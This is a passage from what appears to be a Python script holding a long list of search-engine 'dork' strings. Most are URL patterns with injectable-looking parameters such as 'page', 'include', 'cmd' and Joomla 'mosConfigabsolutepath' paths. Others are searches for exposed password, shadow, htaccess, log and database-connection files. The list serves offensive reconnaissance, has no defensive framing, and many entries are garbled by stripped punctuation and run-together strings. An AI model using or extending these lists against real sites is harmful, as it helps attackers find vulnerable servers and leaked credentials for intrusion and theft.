'book.php?ID', 'book.php?ISBN', 'book/bookcover.asp?bookid',
'book/bookcover.php?bookid', 'book2.php?id', 'bookSingle.php?bookId',
'bookdetail.asp?BookID', 'bookdetail.php?BookID',
'bookdete.php?bookID', 'booking.php?id', 'booking.php?s',
'booking/bandinfo.php?id', 'booklist.asp?bookid',
'booklist.cfm?bookid', 'booklist.php?bookid', 'bookmark.htm',
'bookmark/mybook/bookmark.asp?bookPageNo',
'bookmark/mybook/bookmark.php?bookPageNo', 'bookpage.asp?id',
'bookpage.php?id', 'books', 'books.asp?id', 'books.php?id',
'books/book.asp?projnr', 'books/book.php?projnr',
'bookview.asp?bookid', 'bookview.asp?id', 'bookview.cfm?bookid',
'bookview.php?bookid', 'bookview.php?id',
'bpac/calendar/event.asp?id', 'bpac/calendar/event.php?id',
'bpblogadminlogin|adminsitejohnny.ihackstuff.com', 'bpncom.php?bnrep',
'brand.asp?id', 'brand.php?id', 'brief.php?id', 'browse.asp?catid',
'browse.cfm?catid', 'browse.php?catid', 'browse.php?cid',
'browse/book.asp?journalID', 'browse/book.php?journalID',
'browseitemdetails.asp', 'browseitemdetails.cfm',
'browseitemdetails.php', 'browsepr.asp?pr', 'browsepr.php?pr',
'browser.inc', 'buddylist.blt', 'bug.php?id', 'build.cgi',
'build.err', 'business/details.php?id', 'buy', 'buy.asp?',
'buy.asp?bookid', 'buy.cfm?', 'buy.cfm?bookid', 'buy.php?',
'buy.php?bookid', 'buy.php?category',
'byReimarHoven.AllRightsReserved.Disclaimer|log/logdb.dta',
'bycategory.asp?id', 'bycategory.cfm?id', 'bycategory.php?id',
'cachedfeed.cgi', 'cachemgr.cgi',
'cactigraphview.phpSettingsTreeViewcvsRPM',
'calendar.asp?actionlogin', 'calendar.php?eventid',
'calendar.pl?commandlogin&fromTemplate',
'calendar.pl?commandlogin&fromTemplateencore/forumcgi/display.cgi?preftemptemp&pageanonymous&file',
'calendar/event.asp?id', 'calendar/event.php?id',
'calendar/item.php?id', 'calendar/week.php?cid',
'calendars?ri?t/users.txt',
'cambiaremicrosoftconilsitochevolete...ad.es.adobe',
'cameralinksysmain.cgi', 'campaigns.php?id', 'campas',
'campdetails.php?id', 'campkctoday.php?Start',
'campkcviewevent.php?ItemID', 'canal.php?meiophp?meio',
'canal/imap.php?id', 'car.php?id', 'cardIssuance/product.php?pid',
'cardetail.php?id', 'cardetails.php?id', 'cardinfo.asp?card',
'cardinfo.cfm?card', 'cardinfo.php?card', 'carinfo.php?id',
'carrydetail.php?prodID', 'carsdetail.php?id', 'cart.asp?action',
'cart.asp?cartid', 'cart.asp?id', 'cart.cfm?action',
'cart.cfm?cartid', 'cart.cfm?id', 'cart.php?action',
'cart.php?cartid', 'cart.php?id', 'cart/addToCart.asp?cid',
'cart/addToCart.php?cid', 'cart/detailprod.php?id',
'cart/home.php?cat', 'cart/itemshow.php?itemID',
'cart/proddetails.php?prodid', 'cart/prodsubcat.php?id',
'cart/product.asp?productid', 'cart/product.php?productid',
'cart32.exe', 'cartadd.asp?id', 'cartadd.cfm?id', 'cartadd.php?id',
'cartadditem.asp?id', 'cartadditem.cfm?id', 'cartadditem.php?id',
'cartvalidate.asp?id', 'cartvalidate.cfm?id', 'cartvalidate.php?id',
'cat', 'cat.asp?catid', 'cat.asp?iCat', 'cat.asp?id', 'cat.cfm?iCat',
'cat.php?cat', 'cat.php?catid', 'cat.php?iCat', 'cat/?catid',
'catalog.asp', 'catalog.asp?CatalogID', 'catalog.cfm',
'catalog.cfm?CatalogID', 'catalog.php', 'catalog.php?CAT',
'catalog.php?CatalogID', 'catalog/index.php?cPath',
'catalog/main.asp?catid', 'catalog/main.php?catid',
'catalog/product.asp?catid', 'catalog/product.asp?pid',
'catalog/product.php?catid', 'catalog/product.php?pid',
'catalog/productinfo.php?productsid', 'catalogitem.asp?ID',
'catalogitem.cfm?ID', 'catalogitem.php?ID', 'catalogmain.asp?catid',
'catalogmain.cfm?catid', 'catalogmain.php?catid',
'categories.asp?cat', 'categories.php?cat', 'categories.php?catid',
'categories.php?id', 'categories.php?parentid',
'categories.php?start', 'category.asp', 'category.asp?CID',
'category.asp?c', 'category.asp?catid', 'category.asp?id',
'category.asp?idcategory', 'category.cfm', 'category.cfm?catid',
'category.php', 'category.php?CID', 'category.php?c',
'category.php?categoryid', 'category.php?catid', 'category.php?id',
'category.php?idcategory', 'category/indexpages.php?categoryid',
'categorydisplay.asp?catid', 'categorydisplay.cfm?catid',
'categorydisplay.php?catid', 'categoryid.php?id',
'categorylist.asp?id', 'categorylist.cfm?id', 'categorylist.php?id',
'categoryview.php?categoryid', 'cats.asp?cat', 'cats.php?cat',
'catsdisp.php?cat', 'cbmer/congres/page.asp?LAN',
'cbmer/congres/page.php?LAN', 'cc/showthread.php?p',
'cc/showthread.php?t', 'ccbill/whereami.cgi?gls', 'ccbillfiletypelog',
'cd.php?id', 'cei/cedb/projdetail.asp?projID',
'cei/cedb/projdetail.php?projID', 'cemetery.asp?id',
'cemetery.php?id', 'cfm', 'cfmx?PageID', 'cgi', 'cgibin/1/cmd.cgi',
'cgibin/acart/acart.pl?&page', 'cgibin/awstats.pl?update1&logfile' ]
d0rk += [ 'cgibin/awstats/awstats.pl?configdir',
'cgibin/bbs/read.cgi?file', 'cgibin/bp/bplib.pl?g',
'cgibin/hinsts.pl?',
'cgibin/hinsts.pl?cgibin/bp/bplib.pl?gccbill/whereami.cgi?gls',
'cgibin/ikonboard.cgi', 'cgibin/index.cgi?page',
'cgibin/jammail.pl?jobshowoldmail&mail', 'cgibin/printenv',
'cgibin/probe.cgi?olddat', 'cgibin/quikstore.cgi?category',
'cgibin/telnet.cgi', 'cgibin/telnet.cgicgibin/1/cmd.cgi',
'cgibin/testcgi.exePleasedistributeTestCGI', 'cgibin/ubb/ubb.cgi?g',
'cgibin/ultimatebb.cgi?ubblogin', 'cgibincalendar.cfg', 'cgiirc.conf',
'cgiirc.config', 'cgisys/guestbook.cgi?usercpanel&template',
'cgiwrap', 'chalets.php?id', 'chamber/members.php?id',
'changepassword.asp', 'channel/channellayout.asp?objId',
'channel/channellayout.php?objId', 'channelid', 'chappies.php?id',
'chapsecretscvs', 'cheats/details.php?ID', 'cheats/item.php?itemid',
'checknews.php?id', 'checkout.asp?UserID', 'checkout.asp?cartid',
'checkout.cfm?UserID', 'checkout.cfm?cartid', 'checkout.php?UserID',
'checkout.php?cartid', 'checkout1.asp?cartid', 'checkout1.cfm?cartid',
'checkout1.php?cartid', 'checkoutconfirmed.asp?orderid',
'checkoutconfirmed.cfm?orderid', 'checkoutconfirmed.php?orderid',
'clanek.php4?id', 'clanpage.asp?cid', 'clanpage.php?cid',
'classes/adodbt/sql.php?classesdir', 'classified/detail.php?siteid',
'classifieds.cgi', 'classifieds/detail.asp?siteid',
'classifieds/detail.php?siteid',
'classifieds/showproduct.asp?product',
'classifieds/showproduct.php?product',
'clear/store/products.php?productcategory', 'clientid',
'cloudbank/detail.asp?ID', 'cloudbank/detail.php?ID', 'club.asp?cid',
'club.php?cid', 'clubpage.php?id', 'cm/public/news/news.php?newsid',
'cmd', 'cmd.php?argphp?arg', 'cms/publications.php?id',
'cms/showpage.php?cid', 'cms/story.php?id', 'collectionitem.php?id',
'colourpointeducational/moredetails.asp?id',
'colourpointeducational/moredetails.php?id', 'comedytogo.php?id',
'comersuslistCategoriesAndProducts.asp?idCategory',
'comersuslistCategoriesAndProducts.cfm?idCategory',
'comersuslistCategoriesAndProducts.php?idCategory',
'comersusmessage.asp', 'comersusoptEmailToFriendForm.asp?idProduct',
'comersusoptEmailToFriendForm.cfm?idProduct',
'comersusoptEmailToFriendForm.php?idProduct',
'comersusoptReviewReadExec.asp?idProduct',
'comersusoptReviewReadExec.cfm?idProduct',
'comersusoptReviewReadExec.php?idProduct',
'comersusviewItem.asp?idProduct', 'comersusviewItem.cfm?idProduct',
'comersusviewItem.php?idProduct', 'comextendedregistration',
'comments.asp?id', 'comments.php?id', 'commentsform.asp?ID',
'commentsform.cfm?ID', 'commentsform.php?ID', 'common.php',
'communigateproentrance', 'communiquedetail.php?id',
'community/calendareventfr.asp?id',
'community/calendareventfr.php?id', 'company.asp?ID',
'company/news.php?id', 'companydetails.php?ID',
'components/comartlinks/artlinks.dispnew.php?mosConfigabsolutepath',
'components/comcpg/cpg.php?mosConfigabsolutepath',
'components/comextcalendar/adminevents.php?CONFIGEXT[LANGUAGESDIR]',
'components/comextendedregistration/registrationdetailed.inc.php?mosConfigabsolutepath',
'components/comextendedregistration/registrationdetailed.inc.php?mosConfigabsolutepathcomextendedregistration',
'components/comforum/download.php?phpbbrootpath',
'components/comforum/download.php?phpbbrootpathcomforum',
'components/comgalleria/galleria.html.php?mosConfigabsolutepath',
'components/comgeria/geria.html.php?mosConfigabsolutepath',
'components/commtree/Savant2/Savant2Pluginstylesheet.php?mosConfigabsolutepath',
'components/comperforms/performs.php?mosConfigabsolutepath',
'components/comperforms/performs.php?mosConfigabsolutepathcomperforms',
'components/comphpshop/toolbar.phpshop.html.php?mosConfigabsolutepath',
'components/comphpshop/toolbar.phpshop.html.php?mosConfigabsolutepathcomphpshop',
'components/comrsgallery/rsgallery.html.php?mosConfigabsolutepath',
'components/comrsgery/rsgery.html.php?mosConfigabsolutepath',
'components/comrsgery/rsgery.html.php?mosConfigabsolutepathcomrsgery',
'components/comrsgery/rsgery.html.php?mosConfigabsolutepathrsgery',
'components/comrsgery/rsgery.html.php?mosConfigabsolutepathrsgery.php',
'components/comsimpleboard/imageupload.php?sbp',
'components/comsimpleboard/imageupload.php?sbpcomsimpleboard',
'confidentialsitemil', 'config.php', 'config.php?CCFG[PKGPATHDBSE]',
'config.phpdbunamedbpass', 'confixxlogin|anmeldung',
'conproduct.php?prodid', 'constructies/product.asp?id',
'constructies/product.php?id', 'cont', 'contact.asp?cartId',
'contact.cfm?cartId', 'contact.php?cartId', 'contact.php?id',
'contactdetails.php?id', 'contacts.php?caldir', 'contactsextwml',
'contactus?reportCompany', 'contenido.php?sec', 'content.asp?PID',
'content.asp?artiid', 'content.asp?cID', 'content.asp?categoryId',
'content.asp?conttitle', 'content.asp?id', 'content.asp?p',
'content.cfm?id', 'content.php?PID', 'content.php?artiid',
'content.php?cID', 'content.php?categoryId', 'content.php?conttitle',
'content.php?dtid', 'content.php?id', 'content.php?incphp?inc',
'content.php?nID', 'content.php?op', 'content.php?p',
'content.php?page', 'content.php?pagecontent.php?pagephp' ]
d0rk += [ 'content.php?seitecontent.php?seite',
'content.php?seitephp?seite', 'content/conferenceregister.asp?ID',
'content/conferenceregister.php?ID', 'content/detail.asp?id',
'content/detail.php?id', 'content/index.asp?id',
'content/index.php?id', 'content/pages/index.asp?idcat',
'content/pages/index.php?idcat', 'content/programme.asp?ID',
'content/programme.php?ID', 'content/view.asp?id',
'content/view.php?id', 'contentok.php?id', 'convertdate.php?caldir',
'coppercop/theme.php?THEMEDIR', 'coranto.cgiLoginAuthorizedUsersOnly',
'corporate/faqs/faq.php?Id', 'corporate/newsreleasesmore.asp?id',
'corporate/newsreleasesmore.php?id', 'counter.exe',
'countyfacts/diary/vcsgen.asp?id', 'countyfacts/diary/vcsgen.php?id',
'courses/course.php?id', 'courses/coursedetails.php?id',
'cpage.php?id', 'cps/rde/xchg/tm/hs.xsl/liensdetail.html?lnkId',
'credentials', 'cryolab/content.asp?cid', 'cryolab/content.php?cid',
'csCreatePro.cgi', 'csc/newsdetails.asp?cat',
'csc/newsdetails.php?cat', 'csvdb/csvdb.cgi?filefile.extention',
'ctlBasicshowsWebusercredentials', 'cube/index.php?catid',
'cubecart/index.php?catid', 'cuisine/index.php?id',
'current/diary/story.php?id', 'currentframe', 'curriculum.php?id',
'curriculumvitaefiletypedoc', 'customer/board.htm?mode',
'customer/home.asp?cat', 'customer/home.php?cat',
'customer/product.php?productid', 'customerService.asp?ID1',
'customerService.asp?TextID1', 'customerService.cfm?ID1',
'customerService.php?ID1', 'custompages.php?id', 'cvsweb.cgi',
'cyberfolio/portfolio/msg/view.php?avcyberfolio', 'data',
'dataaccess/article.php?ID', 'datafiletypemdbsitegovsitemil', 'date',
'db.cgi', 'db.php?pathlocal', 'db/CART/productdetails.asp?productid',
'db/CART/productdetails.php?productid', 'db/item.html?item',
'dbase.php?actiondbase.php', 'dbase.php?actiondbase.php?action',
'dbase.php?actionphp?action', 'dbconnect.inc', 'dbfiletypemdb',
'ddoecom/index.php?id', 'ddoecom/product.php?proid',
'de/content.asp?pageid', 'de/content.php?pageid',
'dealcoupon.asp?catid', 'dealcoupon.php?catid', 'debatedetail.asp?id',
'debatedetail.php?id', 'declarationmore.php?declid', 'default.asp',
'default.asp?TID', 'default.asp?cPath', 'default.asp?catID',
'default.aspWebCommander', 'default.asp', 'default.cfm?catID',
'default.php?TID', 'default.php?abre',
'default.php?arquivophp?arquivo', 'default.php?basedir',
'default.php?basepath', 'default.php?body', 'default.php?cPath',
'default.php?catID', 'default.php?channel', 'default.php?chapter',
'default.php?choix', 'default.php?cmd', 'default.php?cont',
'default.php?destino', 'default.php?e', 'default.php?eval',
'default.php?f', 'default.php?goto', 'default.php?header',
'default.php?id', 'default.php?inc', 'default.php?incl',
'default.php?include', 'default.php?index', 'default.php?ir',
'default.php?itemnav', 'default.php?k', 'default.php?ki',
'default.php?l', 'default.php?left', 'default.php?load',
'default.php?loader', 'default.php?loc', 'default.php?m',
'default.php?menu', 'default.php?menue', 'default.php?mid',
'default.php?mod', 'default.php?module', 'default.php?n',
'default.php?name', 'default.php?nivel', 'default.php?oldal',
'default.php?opcion', 'default.php?option', 'default.php?p',
'default.php?pa', 'default.php?pag', 'default.php?page',
'default.php?page/default.php?pagephp', 'default.php?pageweb',
'default.php?panel', 'default.php?param', 'default.php?play',
'default.php?pr', 'default.php?pre', 'default.php?read',
'default.php?ref', 'default.php?root', 'default.php?rub',
'default.php?secao', 'default.php?secc', 'default.php?seccion',
'default.php?seite', 'default.php?showpage', 'default.php?sivu',
'default.php?sp', 'default.php?str', 'default.php?strona',
'default.php?t', 'default.php?thispage', 'default.php?tipo',
'default.php?to', 'default.php?type', 'default.php?v',
'default.php?var', 'default.php?visphp?vis', 'default.php?x',
'default.php?y', 'default/login.phpkerio',
'default/theme.php?THEMEDIR', 'define.php?termphp?term',
'demositeoscommerce.com', 'deportes.cgi?alatest&t',
'description.asp?bookid', 'description.cfm?bookid',
'description.php?bookid', 'designcenter/item.php?id', 'detail',
'detail.asp?id', 'detail.asp?prodid', 'detail.asp?siteid',
'detail.php?ID', 'detail.php?catid', 'detail.php?itemid',
'detail.php?proddetail.php?prod', 'detail.php?prodid',
'detail.php?prodphp?prod', 'detail.php?siteid',
'detailedbook.asp?isbn', 'detailedbook.php?isbn',
'detailedproduct.asp?id', 'details.asp?BookID',
'details.asp?PressReleaseID', 'details.asp?ProductID',
'details.asp?ServiceID', 'details.asp?id', 'details.asp?prodId',
'details.cfm?BookID', 'details.cfm?PressReleaseID',
'details.cfm?ProductID', 'details.cfm?ServiceID',
'details.php?BookID', 'details.php?PressReleaseID',
'details.php?ProductID', 'details.php?ServiceID', 'details.php?id',
'details.php?locdetails.php?loc', 'details.php?locphp?loc',
'details.php?page', 'details.php?prodId', 'details/food.php?cid',
'detectedaninternalerror[IBM][CLIDriver][DB2/6000]',
'developmentsdetail.php?id', 'developmentsview.php?id',
'digantidengan', 'dir', 'direct.php?locdirect.php?loc',
'directions.php?locdirections.php?loc' ]
d0rk += [ 'directory.php?cat', 'directory/contenu.asp?idcat',
'directory/contenu.php?idcat', 'directory/listingcoupons.php?id',
'directory/profile.php?id', 'directory/showcat.php?cat',
'directorylisting.php?cat', 'discontproductpg.php?productid',
'discussions/10/9/?CategoryID', 'discussions/9/6/?CategoryID',
'display', 'display.asp?ID', 'display.php?ID',
'display.php?fdisplay.php?f', 'display.php?filedisplay.php?file',
'display.php?langdisplay.php?lang', 'display.php?ldisplay.php?l',
'display.php?lndisplay.php?ln', 'display.php?pagdisplay.php?pag',
'display.php?page&langdisplay.php?page',
'display.php?page&langphp?page', 'display.php?pagedisplay.php?page',
'display.php?pagephp?page', 'display.php?pdisplay.php?p',
'display.php?pgdisplay.php?pg', 'display.php?sdisplay.php?s',
'display.php?tabledisplay.php?table', 'display.php?tablephp?table',
'displayArticle.php?id', 'displayArticleB.asp?id',
'displayArticleB.php?id', 'displayCategory.php?basepath',
'displayitem.asp?id', 'displayitem.cfm?id', 'displayitem.php?id',
'displaypage.asp?id', 'displaypage.php?elementId',
'displaypage.php?id', 'displaypage.php?tpl',
'displayproduct.php?Product', 'displayproducts.asp',
'displayproducts.cfm', 'displayproducts.php',
'displayrange.asp?rangeid', 'displayrange.php?rangeid',
'displaysunsign.php?id', 'displayuser.php?ID', 'docDetail.aspx?chnum',
'docushare/dsweb/faqgovedu',
'dotproject/modules/files/indextable.php?rootdir',
'dotproject/modules/projects/addedit.php?rootdir',
'dotproject/modules/projects/view.php?rootdir',
'dotproject/modules/projects/vwfiles.php?rootdir',
'dotproject/modules/tasks/addedit.php?rootdir',
'dotproject/modules/tasks/viewgantt.php?rootdir', 'down.php?OpenPage',
'down.php?action', 'down.php?addr', 'down.php?channel',
'down.php?choix', 'down.php?cmd', 'down.php?corpo', 'down.php?disp',
'down.php?doshow', 'down.php?ev', 'down.php?filepath',
'down.php?goFile', 'down.php?home', 'down.php?in', 'down.php?inc',
'down.php?incl', 'down.php?include', 'down.php?ir', 'down.php?lang',
'down.php?left', 'down.php?nivel', 'down.php?oldal', 'down.php?open',
'down.php?pa', 'down.php?pag', 'down.php?pageweb', 'down.php?param',
'down.php?path', 'down.php?pg', 'down.php?phpbbrootpath',
'down.php?pollname', 'down.php?pr', 'down.php?pre', 'down.php?qry',
'down.php?r', 'down.php?read', 'down.php?s', 'down.php?second',
'down.php?section', 'down.php?seite', 'down.php?showpage',
'down.php?sp', 'down.php?strona', 'down.php?subject', 'down.php?t',
'down.php?texto', 'down.php?to', 'down.php?u', 'down.php?url',
'down.php?v', 'down.php?where', 'down.php?x', 'down.php?z',
'download', 'download.asp?id', 'download.php?id',
'download.php?subdownload.php?sub', 'downloadTrial.asp?intProdID',
'downloadTrial.cfm?intProdID', 'downloadTrial.php?intProdID',
'downloaddetails.php?id', 'downloadfree.php?id', 'downloads.asp?id',
'downloads.asp?software', 'downloads.php?fileid', 'downloads.php?id',
'downloads.php?type', 'downloads/category.asp?c',
'downloads/category.php?c', 'downloads/shambler.asp?id',
'downloads/shambler.php?id', 'downloadsinfo.php?id',
'dreaminterpretation.php?id', 'ds.py', 'duclassmatesiteduware.com',
'dudownloadsiteduware.com', 'dump.php?bdid', 'dumpenv.pl',
'dupicsadd.asp|default.asp|view.asp|voting.aspsite',
'dupicsadd.asp|default.asp|view.asp|voting.aspsiteduware.com',
'duware.com', 'dvwssr.dll', 'e107/e107handlers/secureimgrender.php?p',
'eMuleWebControlPanelintextWebControlPanelEnteryourpasswordhere.',
'ePowerSwitchLogin', 'eXistDatabaseAdministrationdemo',
'earth/visitwcmview.php?id', 'earthactivity.cfm?id',
'eboard/modifyform.html?code', 'edatabase/home.asp?cat',
'edatabase/home.php?cat', 'edit.pl', 'editProduct.php?cid',
'edition.asp?areaid', 'edition.php?areaid', 'editor.php?root',
'editor/list.asp|databaseeditor.asp|login.asaareset',
'ednastreamingmp3serverforums', 'education.php?idcat',
'education/content.asp?page', 'education/content.php?page',
'eggdropfiletypeuseruser', 'els/product/product.asp?id',
'els/product/product.php?id', 'emailToFriend.asp?idProduct',
'emailToFriend.cfm?idProduct', 'emailToFriend.php?idProduct',
'emailaddressfiletypecsvcsv', 'emailfiletypemdb',
'emailproduct.asp?itemid', 'emailproduct.cfm?itemid',
'emailproduct.php?itemid', 'emsgb/easymsgb.pl?print',
'en/details.php?id', 'en/main.asp?id', 'en/main.php?id',
'en/mobilephone.php?ProdID', 'en/news/fullnews.asp?newsid',
'en/news/fullnews.php?newsid', 'en/procurement/newsitem.php?newsID',
'en/product.php?proid', 'en/produit.php?id', 'en/publications.asp?id',
'en/publications.php?id', 'en/visit.php?id',
'enablepassword|secretcurrentconfigurationintextthe',
'enc/content.php?HomePath', 'enc/content.php?HomePathdoodle',
'enc/content.php?HomePathdoodlecart',
'enc/content.php?HomePathpoweredbydoodlecart',
'encapscmsPATH/core/core.php?rootencapscmsPATH',
'encore/forumcgi/display.cgi?preftemptemp&pageanonymous&file',
'endymion.sak?.mail.login.page|sake.servlet',
'eng.php?imgeng.php?img', 'eng.php?imgphp?img',
'eng/board/view.php?id', 'eng/rgboard/view.asp?&bbsid',
'eng/rgboard/view.php?&bbsid', 'eng/store/showscat.php?catid',
'engboard/view.asp?T', 'engboard/view.php?T' ]
d0rk += [ 'english/board/view.asp?code',
'english/board/view.php?code', 'english/fonction/print.asp?id',
'english/fonction/print.php?id', 'english/gallery.php?id',
'english/index.php?id', 'english/print.asp?id',
'english/print.php?id', 'english/publicproducts.asp?groupid',
'english/publicproducts.php?groupid', 'enter.php?a', 'enter.php?abre',
'enter.php?addr', 'enter.php?b', 'enter.php?basedir',
'enter.php?body', 'enter.php?chapter', 'enter.php?cmd',
'enter.php?content', 'enter.php?e', 'enter.php?ev', 'enter.php?get',
'enter.php?go', 'enter.php?goto', 'enter.php?home', 'enter.php?id',
'enter.php?incl', 'enter.php?include', 'enter.php?index',
'enter.php?ir', 'enter.php?itemnav', 'enter.php?lang',
'enter.php?left', 'enter.php?link', 'enter.php?loader',
'enter.php?menue', 'enter.php?mid', 'enter.php?middle',
'enter.php?mod', 'enter.php?module', 'enter.php?name',
'enter.php?numero', 'enter.php?open', 'enter.php?pa',
'enter.php?page', 'enter.php?pagina', 'enter.php?panel',
'enter.php?path', 'enter.php?pg', 'enter.php?phpbbrootpath',
'enter.php?play', 'enter.php?pname', 'enter.php?pr', 'enter.php?pref',
'enter.php?qry', 'enter.php?r', 'enter.php?read', 'enter.php?ref',
'enter.php?s', 'enter.php?sec', 'enter.php?second', 'enter.php?seite',
'enter.php?sivu', 'enter.php?sp', 'enter.php?start', 'enter.php?str',
'enter.php?strona', 'enter.php?subject', 'enter.php?texto',
'enter.php?thispage', 'enter.php?type', 'enter.php?viewpage',
'enter.php?w', 'enter.php?y', 'entertainment/listings.php?id',
'episode.php?id', 'errorfoundhandlingtherequestcocoonfiletypexml',
'errorhasoccurredfiletypeihtml', 'eshop.php?id',
'estore/products.php?cat', 'etcindex.of', 'etemplate.php?id',
'event.asp?id', 'event.php?contentID', 'event.php?id',
'event/detail.php?id', 'eventdetails.asp?id', 'eventdetails.php?id',
'eventinfo.asp?p', 'eventinfo.php?p', 'eventlistingsshort.php?s',
'events.asp?ID', 'events.cfm?ID', 'events.cgi?a155&t', 'events.cgi?t',
'events.php?ID', 'events.php?pid', 'events/detail.asp?ID',
'events/detail.php?ID', 'events/details.php?id',
'events/event.asp?id', 'events/event.php?id',
'events/eventdetail.asp?id', 'events/eventdetail.cfm?intNewsEventsID',
'events/eventdetail.php?id', 'events/events.php?id',
'events/index.asp?id', 'events/index.php?id',
'events/uniqueevent.asp?ID', 'events/uniqueevent.php?ID', 'events?id',
'eventsdetail.php?pid', 'eventsdetails.php?id', 'eventsmore.php?id',
'eventtype.php?id', 'exchweb/bin/auth/owalogon.asp',
'exclusive.php?pID', 'exhibitionoverview.asp?id',
'exhibitionoverview.php?id', 'exhibitions/detail.asp?id',
'exhibitions/detail.php?id', 'exhibitions/details.php?id',
'exibir.php?abre', 'exibir.php?get', 'exibir.php?lang',
'exibir.php?p', 'exibir.php?page', 'expanded.php?conf',
'experts.php?subexperts.php?sub', 'exportedemailaddresses',
'extCDXCDX', 'extasa|extbakintextuidintextpwduid..pwddatabase|server|dsn',
'extaspinurlathto.asp', 'extasppathto.asp', 'extccmccmcatacomb',
'extcfgradius.cfg',
'extcgicontrolpanelenteryourownerpasswordtocontinue!',
'extcgieditcgi.cgifile', 'extcgiintextnrgThiswebpagewascreatedon',
'extconfNoCatAuthcvs', 'extconfrsyncd.confcvsman',
'extconfrsyncd.confcvsmanextconfNoCatAuthcvs', 'extdatbpk.dat',
'extdoc|pdf|xls|txt|ps|rtf|odt|sxw|psw|ppt|pps|xmlintextconfidentialsalary|intextbudgetapprovedconfidential',
'extensions/extlist.php?cat', 'extghogho', 'exticsics',
'extincpwdUID', 'extiniVersion4.0.0.4password', 'extinieudora.ini',
'extiniintextenv.ini', 'extjbfjbf', 'extldifldif',
'extlogSoftwareMicrosoftInternetInformation',
'extlogSoftwareMicrosoftInternetInformationServices.',
'extmdb.mdbfpdbshop.mdb', 'extnsfnsfgovmil',
'extpasswdintextthesampleexample',
'extplistfiletypeplistbookmarks.plist', 'extpqipqidatabase',
'extqipqidatabase', 'extregusernameputty', 'exttxtFinalencryptionkey',
'exttxtdxdiag', 'exttxtunattend.txt', 'extvmdkvmdk', 'extvmxvmx',
'extymldatabaseconfig', 'ezPublishadministration', 'faq.asp?cartID',
'faq.cfm?cartID', 'faq.php?', 'faq.php?cartID', 'faq.php?id',
'faq.php?qid', 'faq/category.php?id', 'faq/question.php?Id',
'faq2.php?id', 'faqlist.asp?id', 'faqlist.cfm?id', 'faqlist.php?id',
'faqs.asp?id', 'faqs.cfm?id', 'faqs.php?id',
'fatcat/artistInfo.php?id', 'fatcat/home.asp?view',
'fatcat/home.php?view', 'faxsurvey', 'fcgibin/echo',
'fcms/view.php?cid', 'feature.asp?id', 'feature.php?id',
'feature2.php?id', 'featuredetail.php?id', 'features/view.php?id',
'feedback.asp?title', 'feedback.cfm?title', 'feedback.php?title',
'fellows.php?id', 'ficha.php?id', 'fichespectacle.php?id', 'file',
'file.php?action', 'file.php?basepath', 'file.php?body',
'file.php?channel', 'file.php?chapter', 'file.php?choix',
'file.php?cmd', 'file.php?cont', 'file.php?corpo', 'file.php?disp',
'file.php?doshow', 'file.php?ev', 'file.php?eval', 'file.php?get',
'file.php?id', 'file.php?inc', 'file.php?incl', 'file.php?include',
'file.php?index', 'file.php?ir', 'file.php?ki', 'file.php?left',
'file.php?load', 'file.php?loader', 'file.php?middle',
'file.php?modo', 'file.php?n', 'file.php?nivel', 'file.php?numero',
'file.php?oldal', 'file.php?pagina', 'file.php?param', 'file.php?pg',
'file.php?play' ]
d0rk += [ 'file.php?pollname', 'file.php?pref', 'file.php?q',
'file.php?qry', 'file.php?ref', 'file.php?seccion', 'file.php?second',
'file.php?showpage', 'file.php?sivu', 'file.php?sp', 'file.php?start',
'file.php?strona', 'file.php?texto', 'file.php?to', 'file.php?type',
'file.php?url', 'file.php?var', 'file.php?viewpage', 'file.php?where',
'file.php?y', 'fileinclude', 'filemail.pl', 'filemanager.php?delete',
'filename', 'files.php?cat', 'files.pl', 'fileseek.cgi?head&foot',
'filetypeASPASP', 'filetypeASPXASPX', 'filetypeBMLBML',
'filetypeCFMCFM', 'filetypeCGICGI', 'filetypeDIFFDIFF',
'filetypeDLLDLL', 'filetypeDOCDOC', 'filetypeFCGIFCGI',
'filetypeHTMHTM', 'filetypeHTMLHTML', 'filetypeJHTMLJHTML',
'filetypeJSPJSP', 'filetypeMVMV', 'filetypePDFPDF',
'filetypePHP3PHP3', 'filetypePHP4PHP4', 'filetypePHPPHP',
'filetypePHTMLPHTML', 'filetypePLPL', 'filetypePPTPPT',
'filetypePSps', 'filetypeQBWqbw', 'filetypeSHTMLSHTML',
'filetypeSTMSTM', 'filetypeSWFSWF', 'filetypeTXTTXT',
'filetypeXLSXLS', 'filetypeaspCustomErrorMessageCategorySource',
'filetypeaspDBQServer.MapPath.mdb', 'filetypeasp[ODBCSQL',
'filetypebak\htaccess|passwd|shadow|htusers',
'filetypebakcreateobjectsa',
'filetypebakhtaccess|passwd|shadow|htusers', 'filetypebkfbkf',
'filetypebltbltintextscreenname', 'filetypebltbuddylist',
'filetypecfgautoinst.cfg', 'filetypecfgksintextrootpwsampletesthowto',
'filetypecfgmrtgtarget', 'filetypecfmcfapplicationnamepassword',
'filetypecgiWebStore.cgi', 'filetypecgifileman.cgi',
'filetypecnfvtipvtaccess.cnf', 'filetypeconffirewallcvs',
'filetypeconfigconfigintextappSettingsUserID',
'filetypeconfigweb.configCVS', 'filetypeconfoekakibbs',
'filetypeconfproftpd.PROFTPFTPserverconfigurationfilereveals',
'filetypeconfpsybnc.confUSER.PASS', 'filetypeconfslapd.conf',
'filetypectlhaccess.MicrosoftFrontPageequivalentofhtaccess',
'filetypecttContact', 'filetypecttcttmessenger',
'filetypedatSites.dat', 'filetypedatpassword.dat',
'filetypedatwand.dat', 'filetypedbpdbbackupPilot|Pluckerdb',
'filetypeemlemlintextSubjectintextFromintextTo', 'filetypefp3fp3',
'filetypefp5fp5sitegovsitemilcvslog', 'filetypefp7fp7',
'filetypehpindexinurlhpicalendarsitesourceforge.net',
'filetypeincdbconn', 'filetypeincintextmysqlconnect',
'filetypeincmysqlconnectORmysqlpconnect', 'filetypeinfcapolicy.inf',
'filetypeinfsysprep', 'filetypeiniServUDaemon',
'filetypeiniflashFXP.ini', 'filetypeiniservu.ini',
'filetypeiniwcxftp', 'filetypeiniwsftppwd', 'filetypeldbadmin',
'filetypeliclicintextkey',
'filetypelogPHPParseerror|PHPWarning|PHPError',
'filetypelogSee`ipseccopyright', 'filetypelogaccess.logCVS',
'filetypelogcron.log', 'filetypelogintextConnectionManager2',
'filetypelogintextConnectionManager2�', 'filetypelogpassword.log',
'filetypelogusernameputtyPUTTYSSHclientlogscanrevealusernames',
'filetypemail|filetypeeml|filetypembox|filetypembxintextassword|subject',
'filetypemail|filetypeeml|filetypembox|filetypembxintextpassword|subject',
'filetypembxmbxintextSubject',
'filetypemdbprofilesMicrosoftAccessdatabasescontaininguser',
'filetypemdbusers.mdb', 'filetypemdbwwforum', 'filetypemydmydCVS',
